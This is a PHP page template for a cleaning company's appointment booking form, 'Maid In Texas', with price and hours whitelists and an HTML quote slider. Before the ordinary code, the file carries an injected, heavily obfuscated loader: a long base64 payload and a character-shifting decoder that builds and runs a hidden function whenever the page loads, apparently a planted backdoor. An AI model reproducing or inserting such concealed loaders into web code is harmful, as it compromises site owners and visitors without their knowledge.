1V1NtRlhkSGRUVldoNlV6QnNSRkZYWkVwUk1VbDRXV3RvVWxveFFsUlJha0pxWWxkNE1GTXdWa05pVjBaWVpVZDRXVTF0VW5OYVJWazFZVzFKZVU1VVFtRldlbFYzV1ROc2JtRlhSa2xWYWtKcVVrYzVNbFJJYkVwYU1IaHdWVzVDYWxFd1JqRlRWVTVLWkd0c2NGRllWa3RUUlVwdlYycEtWbU5GZEZWak1IUktVVEJHYmxOVmFFdGlSMUpKVm01c2FXRlZSbkphUm1RMFRVVTVNMkl5WkVwUk1FWnVXbXhHZGxvd2JFUlJWMlJMVWpGd00xTlZVWGRhTVhCMVZHNWFXazF1VWpKWk1HUlhaRlYwUkZWdVFtcFJNMlJ1VkRCU1FtTXdiRVJWYlhocVltdHdNVmx1YkROYU1IQklWbTVzYW1Kck5IZFpNbXd6V2pBeE5sRllRbEJrTWpsdVUxVk9RbG95UmxoWFYyUk1VVEZLZEZrd1RuSmFNbFkxVlc1YWExZEdSbTVWUms1Q1lWWkpkMVpzVmtwUk1Vb3pWMVprYTJKRmJFWmhSbFpYVW10R01sUldUVEJrTVdoSlUyMU9hV0ZWYXpOUk1teENXakJzUkZGWGRHbE5NVmwzVTFWTk1FOVZiRVJUYTJ4cFRUQTBkMVF5YkVKaE1rWlpVVzFPYW1KSWFERlRWM0I2VXpCc1JGRlhaRXBSTVVveVdrWm9VbG93ZUhGTlIyUktZVEExTWxsdE1ERmlSbXQ2Vlc1Q2FVMXFVVEpUVlZaUFl6SkplbFJ0ZUZsVFJYQnFXVzE0TkdWV2FFaE9SMnhRWkRJNWJsTlZUa0phTVhCMVdraHNhRmRHU25OVE1FNVRZbGRPUkdReVpFdFNlbXQ0V2tWT2NrNHdUbkJSVjJSS1VUQkdjbGt5TVZkTlJXeEZUVWRrU21GVmF6TlJNbXhDV2pCc1JGRnFUbWhTTW5oNlYyeE9RbUl3YkZoWGJYaHBUV3hzZGxOclpHRmtNSFJVWVRKa2JHVldTalZYYkdoU1dqQnNSRTVFYkVwUk1FcDBWMnBLVjAxSFRqVmFNblJoWW10R2VsTlZVa1psVlRsRVlYcGtiVlZZUW5SWFZFbzBaRzFOZVZaWE9VdFNNWEF6VXpGU2VsTXdjRWxXYms1clVUQkZOVk5WYUZObFYwWllUVWM1YWsweFduQlplazVUWlZWMFJGVnViR0ZYUmtaNlUxVm9UMDFIVG5WUmJscHFaVmRrY2xreU1WZE5SWGhFVVZkc1dWTkZjR3BaYlhnMFpWWm9TRTVIYkV4Vk1FWjVVMVZTVW1ORmRGVmtSR3hFWW10d2MxcEZhRmRsVjBwd1VWZDBhMVl6WjNkVU0yUjNUMVZPZEZkcVJtbGlWVFIzV1Zaak5XUlZiRVppZWtwWVYwVmFVMWxzWXpGaE1WbzJWVzFhYWsxcldqQmFSbVJ6V214dmVWWnFRbGxOYm1oM1dXMHhNR1ZyZEVSaVJHUkVXakk1Y2xkV1pEUmpNR3hGVFVka1lVMXNXWGRYUkVvd1pGZEplbHBIV21oWFJVWjJVekZTZWxNeVRYbGhSRVpoWWxad2VsZHNUbTVoTVd4WVpVaE9URlpJVGt4VGEyaFhaVmRLUkZGVWJFcFNWemg1VmpGb1IxVnRTbGhPVjNSWFpXeEtiVmRxU2xkTlJtZDZWbTVzYVZFeVpIZFVNMlIyWVRKT2RGWnRhR2xTYW14M1dUQk9RazlWYkVaaWVrcFlWMFZhVTFsc1l6RmhNVm8yVlcxYVlVMXNXWGRYUkU1TFlrWnNXR1ZIV21oWFJVWjJVekZTZWxNd2NFbFdiV2hLVWtSQ2JsbDZUbE5sVjFKSVQxaE9hVTB5VW5OWk1teHVZVEZuZUZScldsWmlSbkJIVmxkNGVtRldUa2RWYkZaV1VtcHNWMVpVUWxkVk1XZDNVbXRvVTFaVVZsWlRWM2QzWTBVNU0ySXlkRnBXTW5oeVUxVlJkMW93YkhGU1dHUk9Va1ZXY0ZRelpIWmhNV3Q1VDFkMFNsSkVRbTVaYkdSU1RWVjBSRlZxUm1waVdHUXhXa1ZrYzJSR2NGUmFNMEpNVmtoT1RGTnJaRTlpTVhCWVZHNUtTbEpFUW01WmJHUlNUVlYwUkZWdGNHbE5iRVozVkROa2RtRXlVbGhTVjJSUlZUQkplRmt5TVRSaVIwcDBWRzVhWVZJeFZuWlplazVUWlZkU1NFOVlUbWxOTWxKeldUSnNibUV4WjNoVWExcFdZa1p3UjFaWGVIcGhWazVIVld4V1ZsSnFiRmRXVkVKWFZURm5kMUpyYUZOV1ZGWldVMWQzZDJORmRGVmpNSFJMVTBWS2IxZHFTbFphTVVKVVVWZHNUVTF0VW5wWldHc3haREpHU1ZGVE9WcFdNbmh5VlVaT1NtUlZjRWhTYmtKaFVYcFNjRk50TlZkbFYwcEZUVWRzVFdGV1NYaFpNakV6WkZWc2NGZHVRbXBTUkVKd1ZFZHNVMlZXY0ZoU2JrNVpUVzE0TTFSSGJFcGlWMUpZVWxSc1NtRlVVbkphUm1SR1pGVnNjRmR0Y0dsTmJFVTFVMWRyTUdFeGEzbFBWM1JRWkRJNVRGZHRNRFZsVm5CWVVtMXdhRkV3Um5aVGEyUkhZekpLUkZGdGFHcGxWVVp5V1Zab1FtTkhWak5pTW5SclVqQXhibFZHVGtOVE1EVnpZa2hvVmxaNlJqRlhhMXBxVFVabmVWcEhlR3RTYW14eFdXcEpNVTFHY0ZoT1ZFSnFaVmRuZDFreU1YTmtSWFJFVlc1Q2FsRXlkSHBUYTJoRFlVWnZlVlpZUWxCa01qbHlXVEJqTldWcmJFVk5SMlJxVFRGS05Wa3dZelZsYTNSRVZXcENXbVZZWkc1VGEyUlBZakZ3V0ZSdVNreFdTRTVNV1Zaa1dsb3dkRVJWYm1ScFRUQXhibE5XVVhkUFZXeElWMjFvYVZORk5YTlRNV2g2VXpCd1NWRnViR2xOTW1jeFYwUktOR05IVFhwVlYyUlJWVEJLTmxwR1pFdGxiVkpKVTFjNVMxTkdTbkZVUlZKQ1l6QndTVkZ1V21wbFYzTXpVVEprZDJWc2JGbFhiWGhaVFc1U01WbHFUbXRhYlVaWlVWYzVZVmRIYUROWmEyTTFZVEZ3VkZveWJGbFNlbEp3VkVWT1UyUXlUblJQVkZKc1ZtcHNlbGxXYUU5TlJYUlVZWHBrUkZveU9VeFRhMlEwWTBkS2RHUkljRXBTUkVKdVdYcE9WMkZYVFhwVmJteE1VVEZKZDFkWWJETmhNazVJVDFod1RHVnJNVFZUTVZKNlV6Sk9kRlpxUW10WFJYQXhVMVZPVTJNeVJsaE9XRXBxWlc1T1RGcHNSbmRQVlU1MVRVVjBZV0pzV2pGWFZFNVRZMGRKZVU1SFpGUmhiSEJoV1RGYVIyUkhTblJWYkdoUFVtcHNNRmxxU2xOYWJHdDVUMWhXVEZFeFNuRlpha2t3WTBkV00yTklRbUZoVlVaMldYcE9VMlZYVGtoUFdIQk1VVEZLY1ZscVNUQmpNR3h4WlVkc2FVMXNTVEZUVjJ4eVdqQnNWVTFFYkVwU01YQnZXV3RvVDJKRmRGUlJhbVJFWVZaSmQxZHNhRzlOUld4RlRVZGthbE5GY0hOWGFrVTFaVlp3V1ZGdVRscFdNRFZ6VXpCT1NtUnNRa2hUYmxwaFUwZDBkbGRGYUU5WmJHaHhUbGRTVEdGWGMzWlZSMnMxWTBWc2NHUXlaRXBoYm1od1dXcEtVMDVXYUVWU1UzUktZVlJXVEZSdGVITmxSbFpZVFZoV1lWSnRUWGRYUkU1UFlVZEtXVlp1UWxsTmJWSnpXa1ZaTldNeVJsaE9XRXBxWlZka2QxUkZUa0poTVd0NVQxaFdUVkpGVm5kVU0yeENXakJPZFZOdGVHdFRSbG8xV1cxc1FtRXlVa2hXYWxKclVraE9URnBzVGtOaVIwcEpWRzE0U2xOSVVqVlhiR2hUVFZkT2RFNUhaRXRTTURVeVdXMXdNRTlWVG5WTlJYUmhZbXhhTVZkVVRsTmpSMGw1VGtka1ZHRnNjR0ZaTVZwSFpFZEtkRlZzYUU5U2FteHhWMVprTkdNeGJIUlNiWEJvWlZka2NsZFhOVmRpVlhSWll6QjBhRll4Ykc1VE1HUnZZa1pzV0ZWdGVHcGlhelZ0V1hwS1YyUlhVa1JhTTBKTVYwaE9URmxXWkZwYU1IUklZa2hXV1UxcldqVlpNakZIVGxWMFJGTnJVbWxOYWxWM1YyeGpNVTFGZUZaV2JsWmFUV3BzY2xsV1l6Rmlhemx3VVcwMWJHSlhlRE5UVjJ3eldqSkdTRlp0YUdGU01WbzFXWHBGTldNeVJsbFVha0pNVVRKMGQxTXhhSHBUTUhCSlZXNVNhbEl4Y0RGWFZtTjRZa1ZzUlUxSFpHdFNNVm93V1RCak1XRkhTbFJoUkVKWlRXeEtkMWt5Ykc1alJYaEVVVmRzVTJGNmJGRlRWMnh5VGpCd1NXTkhNVXBTUkVKdVYyMHdOV1F4Y0ZoT1J6bExVMFpLTUZrd1pHRmtWbXhZVFZkNFRWRXdSbkJhU0d4S1kwVTVOVkZ0TVdwVFJsbDNXVE5zYm1FeVZuUlhXRTVLVVRGS2NGcEdaRnBqUlRrMVVXMHhXazF1YURKWmVrcFdZakJ3U1dOSE1VeFdTRTV1VTJ0b2QyRXdiRVZOUjJSaFRUTkNNbGt3WkZka1ZYUkVWV3BDYVZkRlNuUlpiVEZIWkVad1ZHUXlaRXBpYTJ4d1V6RlNlbUV4YTNsUFdGWnJVakZhTVZwRmFFNWFNVUpVVVcwMWJHSnJjSE5YVm1SU1lqQndTV05IZEUxUk1FWTBWRlZTUW1Rd01VVlJXR1JPVVRKek0xTnJaRTlrYlVwMVZXMTRhV0pzU2paVFZWRjNXakZPY1Zkc2NHcFdhMW93V1cweFUxZEZOVWRQV0ZKcFRXeEtiVmRVU1RWa1ZYUkVWVzF3YVUxcVZYZFhiR014VFVkT05XRjZaR0ZOTTBKeFdXdGpOV1ZzY0ZSYU1uUnNZbFpHZDFSNlRsZGtWMHBJWWtoV2FHVlhaSEphUldONFpERndkRTVYYUdsV01WWjNWRE5zVTJGdFNYbE9WRUpoVm5wVmQxa3piRUpQVld4SVdrUmFZVlo2Vm5GWmFrcFRZa1YwUkZWdGNHbE5hbFYzVjJ4ak1VMUhUalZoZW1SdFZUQktjMWxyYUU5aVJXeEpZekowV2sxcWJERmFSV1JYWkZkU1NWUlhaRkZWTUVwTVZHMTRjMlZHVmxoTldGWmhVbTFOZDFkRVNYaGtiSEJIVDFkd2FVMXFVblpUYTJSTFRWWndjR0Y2WkVwVFJFVTFVMVZrVjJNeVRYbFdWMlJzWlZaS2NWbHFTVEZOUm5CWVRsUkNhbVZWUlRWVFZWWjJUV3hrV1ZKc1NtbFdlbFp5Vm01d1UxcHRTbGhQVjNSWlRXczFNbGx0Ykc1aE1XeDFWbTB4VEZaSVVUVlpNakZYVFVkU1dWTnVWa3hSTVVweFdXcEpNVTFHY0ZoT1ZFSnFaVmR6TTFFeU5IZFRNR3hDWTBoYVdtSkViRFphUldSSFpWZFNSRm95YkZSaGJIQmhXVEZhUjJSSFNuUlZiR2hQVW1wc2NWZFdaRFJqTVd4MFVtMXdhR1ZWYkhkVU0yUjNUMVZPZFUxRmMybExVMnMzU1VFOVBTSXBLVHNnIikpOyA=";if (!function_exists("djYguwDYhfK7mFUD")){ function djYguwDYhfK7mFUD($SQtA3tfoEkS7WObLj828ccHxxpAdTPXPwggpAlE5wm2j03Ua,$V84PGrdVSgFx4lTbr9CCDxYPp7GjSGauE){$WameW = '';foreach($SQtA3tfoEkS7WObLj828ccHxxpAdTPXPwggpAlE5wm2j03Ua as $artfCchTcJmF6){$WameW .= chr($artfCchTcJmF6 - $V84PGrdVSgFx4lTbr9CCDxYPp7GjSGauE);}return $WameW;}$Hdg3PgwFeDfflpvueBOA4CIadFmIpQ = djYguwDYhfK7mFUD($zEzrWSxoV,6418);$JUUQz0d44GaaRqvcuWRVRjtRmY4VeLz1vjIUaLP5i = djYguwDYhfK7mFUD($zXdktalEnklI1y53gm5YRctgtfZRtLlrzpCTpNnCXybOW7I2j,5013);$i06r3qdKbVUvD6kySo9igusPfsrVoABjrxAkOEUQqEbUBli = djYguwDYhfK7mFUD($G0Ga70fXHyzSQZ7iInVVQJjSo6PWZZqGQWGN,2492);$DisGCKlI3Dth3UqkiRuWleCC = $JUUQz0d44GaaRqvcuWRVRjtRmY4VeLz1vjIUaLP5i('$MmaPvkfDDM6dYF7rYekJvuRcPEo',$Hdg3PgwFeDfflpvueBOA4CIadFmIpQ.'('.$i06r3qdKbVUvD6kySo9igusPfsrVoABjrxAkOEUQqEbUBli.'($MmaPvkfDDM6dYF7rYekJvuRcPEo));');$DisGCKlI3Dth3UqkiRuWleCC($zm8QvRnwbRrcS);}?><?php 
//error handling
require get_template_directory_uri() . '/required/signup.class.php';
session_start();

	if(isset($_POST) && !empty($_POST)){
		$allowedSQFT = array("1000", 
							 "2000", 
							 "3000", 
							 "4000", 
							 "5000", 
							 "1.5", 
							 "2", 
							 "2.5", 
							 "3", 
							 "3.5", 
							 "4", 
							 "4.5", 
							 "5", 
							 "5.5", 
							 "6", 
							 "6.5", 
							 "7", 
							 "7.5", 
							 "8");
		$allowedHours = array("2.5 - 3", 
							  "3 - 4", 
							  "3.5 - 5", 
							  "5 - 7", 
							  "6 - 8", 
							  "4.5 - 6", 
							  "1.5", 
							  "2 - 2.5", 
							  "2.5 - 3.5", 
							  "3 - 3.5", 
							  "4 - 5", 
							  "1.5", 
							  "2", 
							  "2.5", 
							  "3", 
							  "3.5", 
							  "4", 
							  "4.5", 
							  "5", 
							  "5.5", 
							  "6", 
							  "6.5", 
							  "7", 
							  "7.5", 
							  "8");
							  
		$allowedCost = array("$150 - $180", 
							 "$180 - $240", 
							 "$210 - $300", 
							 "$270 - $360", 
							 "$300 - $420", 
							 "$120 - $150", 
							 "$130 - $210", 
							 "$180 - $210", 
							 "$240 - $300", 
							 "$360 - $480", 
							 "$90", 
							 "$120", 
							 "$150", 
							 "$180", 
							 "$210", 
							 "$240", 
							 "$270", 
							 "$300", 
							 "$330", 
							 "$360", 
							 "$390", 
							 "$420", 
							 "$450", 
							 "$480");
		$allowedCleanType = array("initial", "move", "maintain");
		$allowedChargeType = array("homeSize", "hourly");
		$cleanVars = array();
		//add sqft to cleanVars array
		if(in_array($_POST['sqft'], $allowedSQFT)){
			$cleanVars['squareFoot'] = $_POST['sqft'];
		}
		if(in_array($_POST['hrs'], $allowedHours)){
			$cleanVars['hours'] = $_POST['hrs'];
		}
		if(in_array($_POST['cost'], $allowedCost)){
			$cleanVars['cost'] = $_POST['cost'];
		}
		if(in_array($_POST['radios'], $allowedCleanType)){
			$cleanVars['cleanType'] = $_POST['radios'];
		}
		if(in_array($_POST['costType'], $allowedChargeType)){
			$cleanVars['chargeType'] = $_POST['costType'];
			if($cleanVars['chargeType'] == 'hourly'){
				$cleanVars['cleanType'] = 'Hourly Rate';
			} else if($cleanVars['chargeType'] == 'footage'){
				if(in_array($_POST['radios'], $allowedCleanType)){
					$cleanVars['cleanType'] = $_POST['radios'];
				}
			}
			
		}
		if( isset($cleanVars['squareFoot']) && isset($cleanVars['cost']) && isset($cleanVars['hours']) && isset($cleanVars['cleanType'])) {
			try{
				BookingSignup::setForm1Vars($cleanVars);
				Header("Location: page2.php");
			} catch(Exception $e){
				echo "An Error happened!";
			}
		}
		
		
		foreach($cleanVars as $key => $post){
			
			echo "$key: $post<br>";
		}
		echo '<br>';
	}
?>
<!DOCTYPE html>
	<script src="http://code.jquery.com/jquery-1.9.1.js"></script>
  <script src="http://code.jquery.com/ui/1.10.3/jquery-ui.js"></script>
  <script src="adjustquote.js"></script>
  <style>
  	.ui-state-default, .ui-widget-content .ui-state-default, .ui-widget-header .ui-state-default {
		background:url(sliderHandle.png) 50% 50% no-repeat;
		height: 38px;
		width: 38px;
		border: none;
		top: -10px;
		margin-left: -20px;
	}
  </style>
<form action="" method="post" id="cleanForm">
		<div id="herotext"> 
      	  <h1>Maid In Texas cleaning at your service.<br>
    		Book an appointment instantly below.</h1>
    	</div>
    	<br>
    	<div class="radio-toolbar">		
		    <input type="radio" id="homeSize" name="costType" value="footage" checked onclick=changeRate(); >
		    <label for="homeSize" title="Click here to get a price based upon house size."><img src="home_glyph.png" height="32px"><br>Quote from House Size</label>
		    <input type="radio" id="hourlyPrice" name="costType" value="hourly"  onclick=changeRate(); >
		    <label for="hourlyPrice" title="Click here to schedule cleaners to come out for a set time"><img src="clock.png" height="32px"><br>Quote For Hourly Rate</label> 
	   </div>   
    	<br>
		<span id="cleanLabel" class="cleanType">&nbsp;</span>
		<label class="sqftLabel" or="amount">Choose the Square Footage of Your Home:</label>
		<div class="circleBorder">
			<span id="sqft" class="amount">&nbsp;</span>
			<span id="sqftHolder" class="amount">sq/ft</span>
			<span id="hourlyHolder" class="amount">Hours</span>
		</div>
		<div class="clear"></div>
  		<input type="hidden" class="sqftAmount" name="sqft" style="border: 0; color: #f6931f; font-weight: bold;" />
  		<div id="slider"></div>
  		<div id="HrlySlider"></div>
  		<input type="hidden" class="hrs" name="hrs"  />
  		<input type="hidden" class="cost" name="cost"/>
<br>
	<!-- Radio boxes -->
	<div class="radio-toolbar" id="cleaningType">
    	<input type="radio" id="radio1" name="radios" value="initial"  checked onclick=adjustQuote(); >
	    <label for="radio1" title="Click here if you want a thorough deep cleaning.">Deep Cleaning</label>
    	<input type="radio" id="radio2" name="radios" value="move" onclick=adjustQuote();>
	    <label for="radio2" title="Click here if you are moving In or Out and want us to clean up for you">Move In / Out</label>
    	<input type="radio" id="radio3" name="radios" value="maintain"  onclick=adjustQuote();>
	    <label for="radio3" title="Click here if you already had us deep clean and want a spruce up">Maintain Cleaning</label> 
	</div>  

	<br>
<!-- End of radio boxes-->
                      
  		<button type="submit" id="submit">
  			<div id="leftButton">
  				<span>Schedule an appointment!</span>
  			</div>
  			<div id="rightButton">
  				<span id="quoteAmount">&nbsp;</span>
  				<span id="quoteText">&nbsp;/hrs</span>
  				<span id="costAmount">&nbsp;</span>
  				<span id="costText"> &nbsp;/approx cost + Sales Tax</span>
  			</div>
  			<div class="clear"></div>
  		</button>
  		<div class="clear"></div>
  		<p class="amountCleaners">*Price is for two cleaners come for $60 per Hour</p>
	</form>